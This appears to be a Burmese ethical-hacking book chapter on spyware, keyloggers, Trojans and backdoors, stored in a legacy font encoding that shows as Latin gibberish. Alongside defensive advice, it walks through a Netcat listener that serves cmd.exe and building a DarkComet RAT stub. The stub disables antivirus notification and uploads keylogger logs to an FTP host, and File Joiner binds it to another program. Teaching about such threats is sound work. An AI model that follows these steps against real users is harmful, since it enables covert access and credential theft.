awGY&SdEdkifjyD; tJonfuaewpfqifh Website aygif;rsm;pGmudk uRefawmfwdkY
0ifMunfhjzpfaeMuvdkYygyJ/
tcsdKUaom website awGu article awGudk zGifhMunfhwJhtcg pop-up awG?
spinner page awG? virus warning (fake) page awG yGifhyGifhvmwwfwmudkvnf;
uRefawmfwdkY BuHKzl;aumif; BuHKzl;MurSmyg/ 'gqdk uRefawmfwdkY&JU company (or)
organization awGxJrSm 'Dvdk spyware (or) keylogger awG ul;pufcH&jcif;rS
umuG,fzdkY bmawGudk vkyfaqmifzdkY vdktyfrvJ/ wwfEdkiforQ BudKwifumuG,fMunfh
&atmifyg/
yxrqHk;tcsufuawmh uRefawmfwdkY&JU vkyfief;oHk;jzpfap wpfudk,fa&oHk;
jzpfap uGefysLwmawGudk omref vkyfaqmifcsufawG vkyfaqmifwJhtcgawGrSm root
(or) administrator account udk roHk;zdkY jzpfygw,f/ Administrator account udk
strong password wpfckck xm;xm;jyD; other user account awGudkom zGifhoHk;apzdkYyg/
administrator access vdktyfyguvnf; run as administrator vkyfvdkY&wmaMumifh
tqifajyr,fvdkY ,lqygw,f/ 'Denf;vrf;u uRefawmfwdkYudk tawmftoifh
umuG,fay;Edkifygw,f/
aemufwpfcku uRefawmfwdkYoHk;wJh Browser onf Firefox browser
jzpfygu Mozila Firefox >> Menu >> add-on >> plugins rSm no script vdkY
&dkuf&SmjyD; scripts awGudk wm;qD;xm;ay;EdkifwJh Plugins udk xnfhoGif;toHk;jyK
Edkifygw,f/ Google Chrome user awGtwGufvnf; no script suit extension udk
xnfhoGif;toHk;jyKEdkifygw,f/ toHk;jyKr,fqdk&ifawmh Facebook udk 0ifa&muf&mrSm
Java Script awG tvkyfrvkyfwmaMumifh 'gawGudk oHk;EdkifzdkYtwGufawmh web add
vkyfay;&rSmjzpfygw,f/
 tpdrf;a&mif + udk click jcif;tm;jzifh tvG,fwul add Edkifygw,f/
tvkyfenf;enf;ydk&Iyfayr,fh safe jzpfygw,f/ Script ygwJh site awGudk tjyma&mif
script noti eJY jyay;xm;ygw,f/ (uRefawmfh&JU http://www.khitminnyo.com
rSmvnf; Zawgyi to Unicode ajymif;vJa&G;cs,fEdkifr,fh Change Font script udk
xnfhoHk;xm;wmaMumifh zGifhMunfhvdkY&ayr,fh Font Change wJh switch ray:bJ
&Sdwwfygw,f/ Zawgyi font install xm;&ifawmh add xm;p&m rvdktyfygbl;/ add
xm;&ifvnf; rnfonfhtEå&m,frQ r&SdygcifAsm/) :)
'gawGtjyif free sharing file awG? Pirate Bay wdkYvdk torrent file awGudk
toHk;rjyKjcif;uvnf; aumif;rGefwJh security measure wpfck jzpfygw,f/ crack
xm;jyD; jyefwifxm;wJh application awGudk roHk;oifhygbl;/ 'ghjyif Pop-up ad
awGudkvnf; click rvkyfoifhyg/ aemufwpfcku ActiveX install wmawG?
pdwfcs,HkMunf&rI r&SdwJh Browser add-on awGudk xnfhoGif;roHk;zdkY jzpfygw,f/
aemufwpfcsuftaeeJY anti-virus awGeJY anti-spyware awGudk toHk;jyKzdkY&,f
update yHkrSef jyKvkyfzdkY&,f jzpfygw,f/
ckazmfjycJhwJh enf;vrf;awGudk vkyfaqmifxm;&if 100% vHkjcHKjyDvdkY
rqdkvdkyg/ Hacker awGonf defender awG&JU tay:rSm tjrJwrf; &SdaeMuygw,f/
'gayr,fh uRefawmf aqG;aEG;cJhwmav;awGudk vkyfaqmifxm;r,fqdk&ifawmh
uRefawmfwdkY&JU pepfudk 0ifa&mufEdkifzdkY ydkrdkcufoGm;rSmjzpfjyD; awmf&Hk
prf;oyfMunfhcsifol awGtwGufawmh 'DhxufydkvG,fr,fh ypfrSwfudk ajymif;vJoGm;ap
ygvdrfhr,f/
aemufqHk;taeeJY uRefawmfhq&m qHk;rcJhwJh pum;av;wpfcGef;udk
jyefvnf rQa0ay;vdkygw,f/ q&m ajymavh&Sdwmu ]]Free software is not free}}
wJh/ wu,fwrf; tcrJhqdkwm pro version awGudk oHk;pGJcsifvmatmif
aMumfjimtaeeJY xkwfxm;wJh version rsdK;awmif tcrJh r&ygbl;/ (tenf;qHk;awmh
aMumfjimav; Munfhay;&wmygyJ)/ 'gqdk License version udk crack jyD; jyefrQa0
ay;aeEdkifwJh software awGuvnf; free r[kwf/ tenf;qHk;awmh rdrd&JU
Information awGudk gather vkyfoGm;wm cH&rSmjzpfjyD; uRefawmfwdkY&JU
tcsuftvufonf olwdkYtwGuf toHk;wnfhygu ,loHk;oGm;wm cH&ygr,f/
toHk;rwnfhwJh tcsuftvufawGeJY omrefoHk;ol wpfa,muf&JU information
awGudkawmh pdk;&drfp&mrvdkbl;aygh/
xdkodkY spyware awGudk &SmazG&mrSm Penetration tester awG toHk;rsm;qHk;
aom software wpfckuawmh open source tool wpfckjzpfwJh HiJackThis yg/
Trend Micro u ydkifqdkifcJhwm jzpfjyD; open source tjzpf jzefYa0ay;cJhygw,f/ (free
eJY open source wlnDjcif;r&Sdyg/ tcrJh &wmcsif;om wlygw,f/) Anti-virus
company rsm;pGmrSmvnf; olwdkY product awGudk tprf;oabm ay;oHk;wJh free
anti-virusawG &SdMuygw,f/ 'gayr,fh 'gawGudk uRefawmfwdkY uGefysLwmawGrSm
apmpD;pGm xnfhoGif;oHk;xm;zdkY vdktyfygw,fcifAs/ ul;pufcH&jyD;rS xyfxnfhwmrsdK;
uawmh pdwfcs&rIydkif;rSm tm;enf;aerSmyJ jzpfygw,f/

HijackThis
'D application udk &,lcsifw,fqdk&ifawmh bit.ly/kmn-hjt (or)
bit.ly/hjt-kmn wdkYuae &,lEdkifygw,f/

toHk;jyKyHkawGuawmh &dk;pif;&Sif;vif;vdkY razmfjyawmhygbl;/ Do a system

scan and save log file u system xJrSm scan zwfay;&Hkru Logfile udkyg
odrf;ay;ygw,f/ scan only om vkyfvdkygu Do a system scan only eJY scan
Edkifygw,f/
Key Scrambler
Spyware awGeJY Keylogger awG&JU &efuae umuG,fEdkifr,fh aemufxyf
enf;vrf; wpfckuawmh Key Scrambler udk toHk;jyKzdkY jzpfygw,f/ umuG,fw,f
qdkwmxuf keylogger udk &IyfaxG;oGm;atmif vkyfypfwmqdk ydkrSefygr,f/ olY&JU
vkyfaqmifyHku keyboard uae &dkufoGif;vdkufwJh keystroke awGudk keylogger
uae rrSwfEdkifao;cifrSm encrypt jyKvkyfvdkufwm jzpfygw,f/

uRefawmfwdkY&JU Browser rSm bit.ly/kmn-ksb vdkY &dkufxnfhjyD;

a'gif;,l&&SdEdkifygw,ff/ a'gif;&r,fhae&mrSmawmh personal (free) version, Pro
version eJY Premium version qdkjyD; &Sdovdk Pro eJY Premium awGuawmh Paid
version awG jzpfum wpfBudrf 0,f,l&if uGefysLwm oHk;vHk;xd oHk;EdkifrSm
jzpfygw,f/ Free version av;eJYyJ erlem prf;oHk;jyygr,f/ qGJjyD; install jyD;jyD
qdkygpdkY/
Install jyD;wmeJY reboot vkyfcdkif;rSm jzpfjyD; uGefysLwm jyefyGifhvmwmeJY
vkyfief;pwifvkyfaqmifygw,f/ premium version awGuawmh power p zGifhwmeJY
pwifwm0efxrf;aqmifEdkifjyD; user login vkyfwmawGudkawmif encrypt
vkyfay;Edkifygw,f/ Kernel Based Keylogger awGudkyg tqifrajyatmif
vkyfaqmifay;EdkifpGrf;ygw,f/ Free version rSmawmh Windows Login information
awGudk umuG,fEdkifpGrf;r&Sdayr,fh Program awG pwifEdkifwJhtcsdefuae pjyD;
encryption method eJY umuG,fxm;Edkifygw,f/
'Davmufqdk Spyware & Keylogger awGeJY ywfoufjyD; tawmftoifh
em;vnfoabmaygufjyDvdkY ,lqygw,f/ aemufxyf Chapter wpfck
qufaqG;aEG;&atmifyg/
CHAPTER 19: Trojans & Backdoors

Introduction

Trojan horse vdkY uRefawmfwdkY odMuwJh Trojan onf malware program

wpfrsdK; jzpfygw,f/ worm awGvdk udk,fwdkif yGm;Edkifjcif; r&Sdayr,fh tjyifyef;rSm
w&m;0if software awGvdk ta,mifaqmif0ifa&mufjyD; txJrSmawmh
uRefawmfwdkY&JU information awGudk cdk;,lzdkY pDpOfzefwD;xm;wJh Malicious code awG
yg0ifwmaMumifh owdxm;&r,fh trsdK;tpm;wpfck jzpfygw,f/ 'ghjyif Trojan horse
program xJrSm uRefawmfwdkY&JU uGefysLwmxJudk ul;pufEdkifapr,fh malware
awGvnf; yg0ifaeEdkifygw,f/

Troy jrdKUawmfppfyGJtaMumif; uRefawmfwdkY Mum;odcJhMuzl;ygw,f/ Trojan

war vdkYac:qdkwJh ordkif;0if x&dk*sefppfyGJrSm *&dawGu Troy jrdKUawmfxJudk 0ifa&muf
EdkifapzdkYtwGuf enf;y&d,m,foHk;jyD; zefwD;cJhMuwJh Trojan jrif;&kyfBuD;udk tpGJjyKjyD;
ac:qdkaeMuwJh Trojan Horse onfvnf; x&dk*sef jrif;&kyfBuD;&JU oabmw&m;
twdkif; vkyfaqmifjyKrlygw,f/ Trojan awG[m Backdoor wm0efawGawGudkvnf;
xrf;aqmifwwfMujyD; jyifyu connection awGudk uRefawmfwdkY&JU pepfxJudk
0ifa&mufEdkifzdkYudkvnf;yJ cGifhjyKay;wwfMuygw,f/
Trojan awGudk detect vkyfEdkifzdkY rvG,fulygbl;/ 'gayr,fh Trojan awG
a&muf&SdaejyDqdk&ifawmh uRefawmfwdkY&JU uGefysLwmrSm Internet Bandwidth awG
ododomom wufvmrSmjzpfygw,f/ Trojan awG[m 0ifa&mufvmjyD;csdefrSm
olYudk,fol tjcm;zdkifawGxJudk inject jyKvkyfjc; vHk;0 rjyKvkyfygbl;/
tjcm;zdkifawGudkyg infect jzpfapwmu Virus jzpfygw,f/ xdkYtwl Trojan awG[m
olYbmomolvnf; ryGm;ygbl;/ rdrdudk,fudk,f propagate (or) replicate vkyfEdkifwm
worm awGom jzpfygw,f/ aemufwpfcef;rSm qufaqG;aEG;oGm;ygr,f/
pdwfysufp&m taumif;qHk; Trojan uawmh uRefawmfwdkY uGefysLwmxJrSm &SdaewJh
Virus awGudk &Sif;ay;r,fqdkjyD; a&muf&SdvmwJh Trojan trsdK;tpm;awG jzpfygw,f/
Trojan awGonf Backdoor wm0efudk xrf;aqmifEdkifw,fvdkY
aqG;aEG;cJhw,faemf/ Backdoor qdkwm computer system wpfckudk csdwfquf&mrSm
Authentication method udk bypass vkyfEdkifzdkYtwGuf toHk;jyKwm jzpfygw,f/
tdrfa&SUu 0ifzdkYrvG,fwJhtcg aemufaz;aygufudk toHk;jyKEdkifjcif; udkudk,fpm;jyK
ac:qdkjcif;vnf; jzpfygw,f/ Traditional backdoor awGrSm symmetric nature
(acgufcsdK;nD oabmobm0) &SdMuygw,f/ qdkvdkwmuawmh tpGef;ESpfbufrSm
same connection &Sd&ygr,f/ infection wpfckxufydkjyD; ul;pufcHcJh&wJh PC awGrSm
tqdkyg Backdoor awG usef&SdaecJhEdkifjyD; wpfpHkwpfa,mufu xdk Backdoor udk
&SmazGawGY&SdoGm;ygu ¤if;udk toHk;csoGm;EdkifrSm jzpfygw,f/
tu,fí connection both ends rSmom rwlnDcJhbl;qdk&ifawmh
asymmetric backdoor awGudk toHk;jyKEdkifygw,f/ xdkodkYaom wdkufcdkufrIrsdK;udk
Kleptography vdkY ac:qdkjyD; ,aeY Cryptovirology e,fy,f&JU tpdwftydkif;BuD;
wpf&yftjzpf yg0ifaeygw,f/
malware awGudk zefwD;&mrSm tvG,fwul jyefYyGm;apzdkYvnf; pOf;pm;
&ygw,f/ jyefYyGm;zdkY rvG,fygu malware onf xda&mufrI &SdrSmr[kwfygbl;/
tJovdk malware awGudk jzefY&mrSmawmh botnet &JU tcef;u@onf ta&;ygwJh
ae&muae yg0ifvmygw,f/ Attacker onf malware qD a&mufEdkifr,fh link udk
xnfhoGif;xm;wJh spam message awGudk ay;ydkYygw,f/ rouFmrjzpfrdvdkufwJh
victim u tqdkyg link udk click rd&muae ul;puf jyefYyGm;oGm;ygw,f/ xdkodkYaom
malware awGudk w&m;0if site awGxJrSmvnf; jrSKyfESHxm;Edkifygao;w,f/
tqdkyg message rsdK;awGrSmawmh victim &JU odvdkpdwfudk EId;qGay;Edkifaom
pumvHk;tcsdKUudk acgif;BuD;ydkif;rSm azmfjyxm;avh&Sdygw,f/ Oyrm - rdrdwdkY&JU friend
(or) mutual friend b,fol&JU &Sufp&maumif;wJh "mwfyHk ponfjzifh odvdkpdwf
jzpfapr,fh taMumif;t&mrsdK;udk social engineering oHk;jyD; ay;ydkYavh&SdMuygw,f/
xdkodkY ay;ydkY&mrSm rdrd&JU oli,fcsif;[efaqmifjyD; ay;ydkYwmrsdK; jzpfEdkifygw,f/
xdkodkYaom wdkufcdkufrIrsdK;rSmqdk&ifawmh executable file udk
download ,lcdkif;wmrsdK; (odkYr[kwf) Browser awG&JU Vulnerability ay: rlwnfjyD;
wdkufcdkufEdkifr,fh exploit awGudk vTifhwifxm;wJh web page qD ac:aqmifoGm;
wmrsdK; ponfjzifh yHkpHrsdK;pHk awGYjrif&Edkifygw,f/ 'gawGtjyif USB, DVD, Plugin
pwmawGuaevnf;yJ &&SdvmEdkifygao;w,f/ Free software awGudk w&m;0if
&,lEdkifr,fh website awG rsm;pGm &Sdaeayr,fh user awGuawmh jyefwifay;wJholawG
qDu jzpfap? tvG,fwul 0,fvdkY&wJh acGawGuae jzpfap
xnfhoGif;Muwmrsm;ygw,f/ tcrJhjyefwifay;wJh origin r[kwfwJhae&mawGuae
jyefrQay;wJh software awGudk jyefvnf ppfaq;MunfhwJhtcg malware awGeJY
aygif;pyfxm;wmawG? malicious code awG xyfxnfhxm;wmawG? crack file rSm
malware awG xnfhxm;wmawG pwmawGudk BuHKawGYMu&ygawmhw,f/

Capabilities
malware awGonf aumif;^qdk; action ESpfrsdK;vHk; vkyfaqmifEdkifMu
ygw,f/ wu,fawmh malware qdkwm uRefawmfwdkYudk,fwdkifu ododvsufeJY
jznfhoGif;vdkuf&wJh application rsdK; r[kwfygbl;/ uRefawmfwdkY&JU knowledge rygbJ
vsuf uRefawmfwdkY&JU pepftwGif;rSm ae&m0if,ljyD; attacker &JU tusdK;pD;yGm;twGuf
jzpfap? uRefawmfwdkY pepfrSm ysufpD;,dk,Gif;atmifjzpfap vkyfaqmifwJh software
wpfckck&JU tpdwftydkif; jzpfaeEdkifygw,f/
malware awGonf victim &JU uGefysLwmudkjzpfap? victim computer
uae tjcm;aom uGefysLwmawGudk jzpfap DoS attack awG
vkyfaqmifEdkifwJhtpGrf;vnf; &SdMuygw,f/ FTP Trojan tjzpfvnf; malware
awGudk toHk;jyKEdkifMuygao;w,f/ Trojan awG trsdK;tpm; rsm;pGm &Sdovdk
pGrf;aqmif&nfawGvnf; uGmjcm;Muygw,f/ Trojan Banker udk Bank account
awGeJY Debit (or) Credit card awGudk cdk;,lEdkifzdkY toHk;jyKMuygw,f/ Trojan
awGonf ul;pufcH&wJh uGefysLwmuae password awG? cached password awG
pwmawGudk scan &,ljyD; hacker xH jyefvnfay;ydkYygw,f/
DoS attack Trojan uawmh ul;pufcH&wJh uGefysLwmawGuae
tjcm;tjcm;aom uGefysLwmawGxHudk DDoS wdkufcdkuf&mrSm yl;aygif;yg0ifapzdkY
vkyfaqmifEdkifygw,f/ uRefawmfwdkY pufxJrSm &SdaewJh tjcm;aom virus awGudk
z,fay;&if; ae&m0if,lwwfwJh Fake Anti-Virus Trojan vnf; &Sdygao;w,f/
Trojan wdkY&JU xHk;pHtwdkif; tcsuftvufawGudk vQdKU0Suf &,lzdkY qdkayr,fh tqdkyg
Trojan trsdK;tpm;uawmh money cdk;,lzdkYom t"duxm; vkyfaqmifygw,f/ olu
b,favmufxd vnfovJqdk&if olYudk z,frypfapzdkYtwGuf virus awGudk
rMumcP jyavh&SdjyD; clean wpfcsufESdyf&HkeJY ajz&Sif;EdkifwmrdkYvdkY uRefawmfwdkY&JU
rdwfaqGtjzpf uGefysLwmxJrSm xm;xm;rdwwfygw,f/ wu,fwrf;rSmawmh
ol&SmawGYcJhw,fqdkwJh (rMumcP azmfjyay;aewJh 1 or 2 ta&twGuf&SdwJh) virus
awG[m wu,fr&Sdygbl;/ olYbmom notification (warning) twk jyjyD;
z,f&Sm;wJhtcgrSmvnf; vdrfnmz,f&Sm;vdkufjcif;om jzpfygw,f/ aemufydkif; tcsdef
MumvmwJhtcg Virus rsm;pGmudk azmfjyvmwwfjyD; clean &ef aiGawmif;cHwmrsdK;awG
vkyfvmygawmhw,f/ 'ghjyif tjcm;aom Anti-virus pro awGudkvnf; olYxHrSm
aps;oufompGmeJY a&mif;csygvdrfhOD;r,f/ uRefawmfwdkYuom uRefawmfwdkY&JU Credit
card information udk jznfhjyD; olYqDu aps;oufoufomom
0,frdvdkufjyDqdk&ifawmh ol &&SdoGm;wJh tcsuftvufawGudk oHk;jyD; uRefawmfwdkY&JU
u'fxJu xkwfvdkY&oavmuf aiGawGudk xkwfoGm;awmhrSmyg/
Gamer awG rkef;wJh Game Thief Trajan wpfrsdK; &Sdygao;w,f/
oluawmh Online Game account awGudk t"du ypfrSwfxm;ygw,f/ Online
Game Account awGrSm Payment information awGyg ygwwfwmrdkYvdkY Credit card
eJY csdwfqufxm;wJh account awGqdk&if aiGaMu;qHk;&HI;rIyg ygoGm;ygawmhw,f/
Game orm;awGuawmh aiGaMu;xuf rdrdtcsdefay; upm;xm;&wJh high level
awGudk ydkjyD; ESajrmwwfMuygw,f/
Trojan-IM u uRefawmfwdkY&JU Login information awGudk t"du
ypfrSwfxm;avh&SdjyD; Trojan Ransom uawmh uRefawmfwdkY&JU a'wmawGudk modify
vkyfjyD; a'wmawG jyef&zdkYtwGuf aiGawmif;cHwJh yHkpHeJY vkyfaqmifygw,f/ Trojan
SMS uawmh tcsdKUEdkifiHawGrSm Operator awGtwGuf tvkyfvkyfay;wJh
yHkpH ,lqvdkY&ygw,f/ Mobile user awGudk SMS awG tvdktavsmuf
toHk;jyKaeapjcif;tm;jzifh aiGukefaMu;us rsm;atmif vkyfaqmifygw,f/ Trojan
Spy uawmh uRefawmfwdkY od&Sdxm;wJh Spyware awG&JU vkyfaqmifyHkeJY
vkyfaqmifwmyg/

Netcat
qGZfppfoHk;"g;vdk vkyfief;aygif;pHk vkyfaqmifEdkifwJh Netcat udk Swiss
Army Knife for hackers vdkY ac:qdkMuavh &Sdygw,f/ oabmuawmh Hacker awG
twGuf bufpHkoHk;EdkifwJh vufeufwpfckaygh/ TCP or UDP rSm rnfonfh
connection rSmrqdk outbound & inbound connection ESpfrsdK;vHk;udk zefwD;EdkifpGrf;wJh
Windows based tool wpfckvnf; jzpfygw,f/ rnfonfh port rSmrqdk
toHk;jyKEdkifjcif;u Ethical hacker awGtaeeJY Netcat udk toHk;rsm;&jcif;
taMumif;&if;wpfck jzpfapygw,f/
olYudk port Scanner taeeJY toHk;jyKEdkifwm uRefawmfwdkY od&SdjyD;
jzpfygw,f/ Netcat onf command line tool wpfckjzpfjyD; program awGudk
manage vkyfEdkifzdkYtwGuf switch aygif;rsm;pGm xnfhoGif;xm;ygw,f/ Terminal rSm
netcat -h vdkY &dkufxnfhjyD; option wpfckcsif;pDudk tao;pdwf Munfh&IEdkifovdk man
netcat eJYvnf; manual azmfMunfhEdkifygw,f/ Netcat rSm -v onf Verbose mode
udk qdkvdkjyD; -vv eJY more verbose toHk;jyKEdkifygw,f/ -d option uawmh netcat udk
stealth mode eJY vIyf&Sm;ay;aprSmjzpfjyD; -z uawmh port scanning twGufoHk;wJh
Zero mode jzpfygw,f/ -w2 udk timeout value (second) tjzpf toHk;jyKygw,f/
 netcatudk telnet yHkpHrsdK;eJYvnf; toHk;jyKEdkifjyD; netcat (or) nc qdkjyD; ESpfrsdK;
toHk;jyKEdkifygw,f/ Windows twGuf Netcat udkawmh bit.ly/kmn-nc rSm
a'gif;,lEdkifygw,f/ download &vmwJh zip file udk nc qdkwJh folder xJrSm extract
vkyfjyD; ae&mvGwfrSm Ctrl + Right click ESdyfum Open command windows here
udk a&G;cs,fvdkuf&ygr,f/

jyD;&ifawmh cmd rSm netcat xJ 0ifa&mufjyD; jzpfwJhtwGuf command

awGudk pwifoHk;EdkifjyDjzpfygw,f/ Windows rSm vkyfaqmifMunfhEdkifzdkYtwGuf
vdktyfwJh putty application udk bit.ly/kmn-putty uae a'gif;,lEdkifygw,f/ install
vkyfp&mrvdkwJh application av;yg/ jyD;&ifawmh Windows rSmyJ apmapmu
ajymxm;wJh nc folder udk Shift + Right click >> Open command window here
eJY zGifhxm;wJh cmd (command line) rSm netcat command awGudk toHk;jyKEdkifygjyD/
listener vkyfzdkYtwGuf -l eJY verbose mode twGuf -v , port twGuf -p ,
executable twGuf -e wdkYudk toHk;jyKygr,f/

yxrqHk;tBudrf toHk;jyKwmqdk&ifawmh Access awmif;cHygvdrfhr,f/

Allow vkyfay;zdkY vdktygygw,f/ txufyg yHkrSmawmh uRefawmfu port 4444 udk
xnfhoGif;xm;jyD; execute taeeJY cmd.exe udk a&G;cs,fxm;ygw,f/ jyD;&if putty
udk zGifh&ygr,f/

putty configuration rSm IP eJY port 443 udk configure

vkyfMunfhEdkifygw,f/

Login information jznfhoGif;&ygr,f/

root user taeeJY 0ifa&mufvdkufygw,f/

putty rSm root@kali:~# qdkjyD; ay:vmwm awGYjrif&ygr,f/ uRefawmfu

Kali Linux run aewJh VM wpfvHk;eJY csdwfqufcJhwmrdkY jzpfygw,f/

Trojan
Trojan eJY ywfoufvdkY tay:rSmvnf; tenf;i,f aqG;aEG;cJhjyD;ygjyD/
'DaeYacwfrSm awGY&rsm;wJh Trojan trsdK;tpm;uawmh Remote Access Trojan
(RAT) yg/ RAT udk vGwfvyfwJh oD;jcm; component oHk;ckeJY zefwD;xm;ygw,f/
Oyrmay;&&if Apocalypse vdkYac:wJh RAT eJY aqG;aEG;ygr,f/ Infected computer
rSm run Edkifr,fh Malicious code awGudk server rSm odrf;qnf;xm;ygw,f/
'Dae&mrSm server onf on victim om jzpfygw,f/ on attacker r[kwfygbl;/
client uawmh server udk xdef;csKyfEdkifzdkYtwGuf attacker u
zefwD;xm;wJh program jzpfygw,f/ data onf client eJY server Mum;rSm share
Edkifygw,f/ Hacker vdkcsifwJh yHkpHeJY zefwD;EdkifzdkYtwGuf server wnfaqmufwJh
program wpfck &Sdygao;w,f/ hacker taeeJY server uae listen on vkyfr,fh
port awGudk ajymif;vJwmrsdK;vnf; vkyfcsif vkyfEdkifovdk configure vkyfzdkY vdktyfwJh
registry key awGudkvnf;yJ establish vkyfEdkifygw,f/ jyD;awmh client & server Mum;
data traffic udkvnf;yJ encrypt jyKvkyfxm;csif jyKvkyfxm;Edkifygao;w,f/

DarkComet RAT
Remote Access Trojan (RAT) awGxJurS ckaqG;aEG;rSmu DarkComet
RAT jzpfygw,f/ bit.ly/dcRAT-kmn rSm a'gif;,lEdkifygw,f/ zip passwords
uawmh rekings.com yg/ install rvkyf&wJh portable app jzpfvdkY Folder
vdkufuav; odrf;xm;zdkYawmh vdkygr,f/

zGifhjyD; menu uae server module >> Full editor udk 0ifvdkufyg/
 uRefawmfwdkYtaeeJY a&G;cs,f setting vkyfaqmifp&mawGudk
awGYjrif&ygr,f/

Main settings rSmawmh odyfjyD; xl;xl;jcm;jcm; r&Sdygbl;/ Security

password ay;vdku ay;EdkifjyD; password toHk;jyKr,fqdk&ifawmh client setting
xJrSmyg password wlatmif zefwD;xm;zdkY vdktyfygr,f/ password ray;bJ
xm;Munfh&atmif/ Active FWB uawmh Firewall bypass vdktyf&if
xnfhoHk;zdkYyg/ toHk;rjyKoifhwJh tajctae oHk;rsdK;udk azmfjyxm;jyD; xdktajctae
oHk;rsdK;uae vGwfuif;w,fqdk&ifawmh toHk;jyKEdkifygw,f/

Network settings rSmawmh IP eJY Port jznfhoGif;&rSmyg/ 'Dae&mrSmawmh

local host IP udkyJ erlem jyxm;ygw,f/ add udk toHk;jyKjyD; xyfxnfhEdkif
ygao;w,f/
 Module Startup rSmawmh rdrd jyifqifvdk&mawG yg&if
jyifqifEdkifygao;w,f/ Creation date wdkY? Parent folder attrib wdkY ponfjzifh
jyKjyifvdku jyKjyifEdkifygao;w,f/

Install Message rSmawmh rdrdzefwD;xm;wJh Program install pOfrSm

azmfjyapvdkwmudk xnfhoGif;Edkifygw,f/ Test Message Box udk ESdyfjyD;vnf;
ay:r,fh yHkpHudk MunfhEdkifygw,f/

rdrdwdkY&JU Victim udk vSnfhpm;EdkifzdkYtwGuf 'Dae&mrSm tqifajywmudk

a&;om; azmfjyEdkifygw,f/

Module Shield rSmawmh rdrdwdkY jznfhpGufvdk&mawGudk trSefjcpf

jznfhay;&HkygyJ/ Oyrm Task manager udk disable vkyfr,f qdkwmrsdK;aygh/
uRefawmfuawmh Anti-Virus Notify udkyJ Disable vdkufygw,f/
 Keylogger ydkif;rSmawmh Keylogger udk activate vkyfr,f/
uRefawmfwdkYrSm FTP Host wpfckck vkyfxm;wm&Sd&if vdyfpmxnfhoGif; user &
password xnfhoGif;jcif;tm;jzifh uRefawmfwdkY&JU FTP server xH Logs awGudk
upload wifay;aerSm jzpfygw,f/ Account eHab;u vlyHkav;udk ESdyfjyD;vnf;
client setting awGudk xyfrH jyKjyifEdkifygao;w,f/ 'Dae&mrSmawmh tJ'Dtydkif;udk
razmfjyawmhygbl;/

Choose Icon rSm ol erlemay;xm;wJh icon awGudk rBudKuf&if

uRefawmfwdkY zefwD;xm;wJh icon awGudkvnf; toHk;jyKEdkifygw,f/
 File Binder uawmh uRefawmfwdkY zefwD;xm;wJh zdkifudk tjcm; photo,
movie, mp3, pwmawGeJY aygif;pyfay;vdku toHk;jyKEdkifwJh option yg/
(uRefawmfuawmh 'gudk roHk;ygbl;/)

aemufqHk; Stub Finalization rSmawmh .exe , .com, .bat, ponfjzifh

a&G;cs,fp&m awGYygr,f/ uRefawmfuawmh .exe eJYyJ qufoGm;vdkufygw,f/

tm;vHk;jyD;jyDrdkY atmufqHk;u Build The Stub udk ESdyfjyD; Desktop ay:rSm

test.exe qdkwJhemrnfeJY save vdkufygw,f/ ckcsdef Desktop ay:udk Munfh&if
uRefawmf zefwD;vdkufwJh test.exe (Trojan) av; &&SdvmygjyD/ victim u
zGifhwJhtcgrSmvnf; uRefawmfwdkY azmfjyay;xm;wJh message udk jrif&rSmjzpfjyD; OK
wpfckyJ ESdyfp&m ygygw,f/
listen zdkYtwGufuvnf; listen to new port uae listen Edkifygw,f/
Wrappers
uRefawmfwdkYawG Keylogger yg0ifaewJh Trojan wpfckudk zefwD;cJhMu
jyD;ygjyD/ tqdkyg Trojan awGudk target xH 'Dwdkif;ydkY&wmrsdK;vnf; jzpfEdkifovdk tjcm;
zdkifawGeJY aygif;pyf&rSmrsdK;vnf; jzpfEdkifygw,f/ uRefawmfwdkY ydkYr,fh zdkifudk usdef;ao
zGifhMunfhr,fvdkY rajymEdkifwJhtwGuf yHkpHrsdK;pHk toGifrsdK;pHkeJU ydkYaqmifrSomvsif
atmifjrifzdkY vrf;p ydkrsm;ygr,f/ aumif;jyD/ 'gqdk&if program ESpfck (odkYr[kwf)
ESpfckxuf ydkwJh program awGudk b,fvdk aygif;pyfzefwD;MurvJ/ 'Dae&mrSm
wrapper tcef;u@ a&mufvmygawmhw,f/
tJonfvdk xkwfydk;&mrSm tultnDay;r,fh wrapping tool awG
&Sdygw,f/ Elite Wrap, IzPack for Java applications, Senna Spy eJY File Joiner
wdkYyJ jzpfygw,f/ tjcm; tool awGvnf; rsm;pGm &SdMuygao;w,f/ 'D tool awGudk
toHk;jyK&wJh &nf&G,fcsufuawmh w&m;0if software awGxJrSm virus (or)
malware awGudk xnfhoGif;vdkwmaMumifh jzpfygw,f/ ('gaMumifh torrent site awGeJY
Cracked application rsdK;awGudk toHk;rjyKoifhbl;vdkY ajymcJhwm jzpfygw,f)

File Joiner
bit.ly/kmn-fj uae download &,ljyD; extract jznfxm;yg/
 Portable file rdkY open vdkuf&HkeJY txufygtwdkif; jrifawGY&rSm jzpfygw,f/

Add file uae program zdkifwpfckeJY test.exe vdkY emrnfay;xm;wJh cke

Trojan ESpfzdkif a&G;cs,fvdkufjyD; Join vdkufygw,f/ zdkifqdk'fawGu
odyfrrsm;wmaMumifh cPyJ MumrSmjzpfjyD; uRefawmfwdkY a&G;xm;wJh output location
rSm output file udk awGYEdkifjyD jzpfygw,f/ tvm;wl file Joiner wpfrsdK;udkvnf;
bit.ly/adv-fj uae a'gif;,lEdkifygao;w,f/

Counter Measures
Counter Measure awGtaeeJY bmawG vkyfxm;oifhvJqdk&ifawmh
uRefawmfwdkY&JU company (or) organization rSm jzpfEdkif&if Windows udk License
version udk toHk;jyKzdkY eJY system update awG rSefrSef vkyfaqmifay;zdkY
vdktyfygw,f/
Anti-virus awGudk toHk;jyK&rSmjzpfovdk virus definition awGudkvnf;
update tjrJvkyfxm;zdkY vdktyfygw,f/ aemufwpfckuawmh vkyfief;wGif;rSm
network (csdwfqufxm;wJh) uGefysLwmwdkif;rSm toHk;jyKolawG tm;vHk;udk
(0efxrf;tm;vHk;udk) security qdkif&m todynmay;rIawG vdktyfrSmjzpfjyD; work
twGuf rjzpfrae toHk;jyK&r,fh application awGuvGJ&if usefwmawGudk xnfhoGif;
toHk;jyKcGifh rjyKzdkY vdkygw,f/
a&SUtcef;awGrSm aqG;aEG;cJhovdk Administrator Account uae
toHk;jyKwmrsdK; rvkyfapbJ other user account awGuae toHk;jyKapzdkY
pDpOfay;xm;&ygr,f/ vdktyfvdkY software awG &,l toHk;jyK&&ifvnf; trusted (or)
origin site awGuae &,ltoHk;jyKjcif;tm;jzifhvnf; umuG,fEdkifygw,f/ 'D
Chapter udkawmh 'Dae&mav;rSmyJ &yfem;&atmifyg/
